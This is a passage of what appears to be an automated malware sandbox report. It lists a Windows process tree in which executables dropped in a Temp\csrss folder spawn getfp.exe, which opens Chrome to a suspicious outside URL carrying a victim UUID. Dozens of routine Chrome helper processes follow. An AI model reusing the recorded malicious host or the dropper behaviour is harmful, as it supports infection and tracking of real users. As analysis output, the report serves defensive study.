        "C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe"
        13⤵
        
        PID:4916
        
        C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe
        12⤵
        
        PID:4964
        
        C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe"
        13⤵
        
        PID:1984
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" http://humisnee.com/test.php?uuid=52d55871-9f49-4f5d-bbca-b7ebe1f9080b&browser=chrome
        14⤵
        
        PID:6620
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd0,0xd4,0xd8,0xac,0xdc,0x7fff7d126e00,0x7fff7d126e10,0x7fff7d126e20
        15⤵
        
        PID:6632
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1888 /prefetch:8
        15⤵
        
        PID:6780
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1500 /prefetch:2
        15⤵
        
        PID:6772
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2216 /prefetch:8
        15⤵
        
        PID:6872
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2868 /prefetch:1
        15⤵
        
        PID:7012
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2860 /prefetch:1
        15⤵
        
        PID:7004
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:1
        15⤵
        
        PID:7048
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
        15⤵
        
        PID:7064
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3704 /prefetch:1
        15⤵
        
        PID:7088
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3924 /prefetch:1
        15⤵
        
        PID:7108
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4124 /prefetch:8
        15⤵
        
        PID:6612
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5348 /prefetch:8
        15⤵
        
        PID:8028
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5400 /prefetch:8
        15⤵
        
        PID:8088
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5344 /prefetch:8
        15⤵
        
        PID:8124
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5488 /prefetch:8
        15⤵
        
        PID:8172
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5848 /prefetch:8
        15⤵
        
        PID:7176
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5852 /prefetch:8
        15⤵
        
        PID:7292
        
        C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
        
        "C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings
        15⤵
        
        PID:7336
        
        C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
        
        "C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff720ea7740,0x7ff720ea7750,0x7ff720ea7760
        16⤵
        
        PID:7368
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5800 /prefetch:8
        15⤵
        
        PID:7416
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4692 /prefetch:8
        15⤵
        
        PID:7432
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5980 /prefetch:8
        15⤵
        
        PID:7500
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5992 /prefetch:8
        15⤵
        
        PID:7532
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5392 /prefetch:8
        15⤵
        
        PID:7580
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6080 /prefetch:8
        15⤵
        
        PID:3732
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4836 /prefetch:8
        15⤵
        
        PID:7676
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5248 /prefetch:8
        15⤵
        
        PID:7728
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5304 /prefetch:8
        15⤵
        
        PID:7768
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4940 /prefetch:8
        15⤵
        
        PID:7792
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4808 /prefetch:8
        15⤵
        
        PID:7872
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4800 /prefetch:8
        15⤵
        
        PID:7908
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5176 /prefetch:8
        15⤵
        
        PID:7940
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6204 /prefetch:8
        15⤵
        
        PID:8012
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6180 /prefetch:8
        15⤵
        
        PID:796
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6428 /prefetch:8
        15⤵
        
        PID:6596
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6104 /prefetch:8
        15⤵
        
        PID:8060
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4824 /prefetch:8
        15⤵
        
        PID:588
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5224 /prefetch:1
        15⤵
        
        PID:4980
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4804 /prefetch:8
        15⤵
        
        PID:8088
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6948 /prefetch:8
        15⤵
        
        PID:8176
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7092 /prefetch:8
        15⤵
        
        PID:7296
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7212 /prefetch:8
        15⤵
        
        PID:8152
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7096 /prefetch:8
        15⤵
        
        PID:3868
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7472 /prefetch:8
        15⤵
        
        PID:7392
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7492 /prefetch:8
        15⤵
        
        PID:808
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7724 /prefetch:8
        15⤵
        
        PID:7440
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7480 /prefetch:1
        15⤵
        
        PID:7528
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3688 /prefetch:8
        15⤵
        
        PID:2380
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8204 /prefetch:8
        15⤵
        
        PID:7648
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4432 /prefetch:8
        15⤵
        
        PID:7300
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8300 /prefetch:8
        15⤵
        
        PID:8168
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4356 /prefetch:1
        15⤵
        
        PID:7324
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4296 /prefetch:8
        15⤵
        
        PID:7444
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8288 /prefetch:8
        15⤵
        
        PID:7700
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3604 /prefetch:8
        15⤵
        
        PID:1896
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3652 /prefetch:8
        15⤵
        
        PID:4884
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4728 /prefetch:8
        15⤵
        
        PID:6920
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2056 /prefetch:8
        15⤵
        
        PID:7740
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2548 /prefetch:8
        15⤵
        
        PID:8156
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2408 /prefetch:8
        15⤵
        
        PID:8136
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2172 /prefetch:8
        15⤵
        
        PID:7648
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8240 /prefetch:8
        15⤵
        
        PID:7640
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5716 /prefetch:8
        15⤵
        
        PID:5028
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=4356 /prefetch:2
        15⤵
        
        PID:6112
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8064 /prefetch:8
        15⤵
        
        PID:7164
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8096 /prefetch:8
        15⤵
        
        PID:6508
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6648 /prefetch:8
        15⤵
        
        PID:7028
        
        C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\89.257.200\software_reporter_tool.exe
        
        "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\89.257.200\software_reporter_tool.exe" --engine=2 --scan-locations=1,2,3,4,5,6,7,8,10 --disabled-locations=9,11 --session-id=naW8uqcSdu6yFMuRkL4DMVCbrnwJ7jy5iMfrPuNW --registry-suffix=ESET --srt-field-trial-group-name=Off
        15⤵
        
        PID:6504
        
        \??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\89.257.200\software_reporter_tool.exe
        
        "c:\users\admin\appdata\local\google\chrome\user data\swreporter\89.257.200\software_reporter_tool.exe" --crash-handler "--database=c:\users\admin\appdata\local\Google\Software Reporter Tool" --url=https://clients2.google.com/cr/report --annotation=plat=Win32 --annotation=prod=ChromeFoil --annotation=ver=89.257.200 --initial-client-data=0x244,0x248,0x24c,0x220,0x250,0x7ff66d33ac28,0x7ff66d33ac38,0x7ff66d33ac48
        16⤵
        
        PID:6508
        
        \??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\89.257.200\software_reporter_tool.exe
        
        "c:\users\admin\appdata\local\google\chrome\user data\swreporter\89.257.200\software_reporter_tool.exe" --use-crash-handler-with-id="\\.\pipe\crashpad_6504_DXHKMGSKZXOYVKSK" --sandboxed-process-id=2 --init-done-notifier=716 --sandbox-mojo-pipe-token=17734187150279719859 --mojo-platform-channel-handle=692 --engine=2
        16⤵
        Loads dropped DLL
        
        PID:2920
        
        \??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\89.257.200\software_reporter_tool.exe
        
        "c:\users\admin\appdata\local\google\chrome\user data\swreporter\89.257.200\software_reporter_tool.exe" --use-crash-handler-with-id="\\.\pipe\crashpad_6504_DXHKMGSKZXOYVKSK" --sandboxed-process-id=3 --init-done-notifier=916 --sandbox-mojo-pipe-token=14528429135537149834 --mojo-platform-channel-handle=912
        16⤵
        
        PID:4472
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8236 /prefetch:8
        15⤵
        
        PID:6080
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8052 /prefetch:8
        15⤵
        
        PID:6792
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4064 /prefetch:8
        15⤵
        
        PID:6584
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8268 /prefetch:8
        15⤵
        
        PID:7760
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1440,550469605775638557,645081924012559080,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3344 /prefetch:8
        15⤵
        
        PID:3976
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
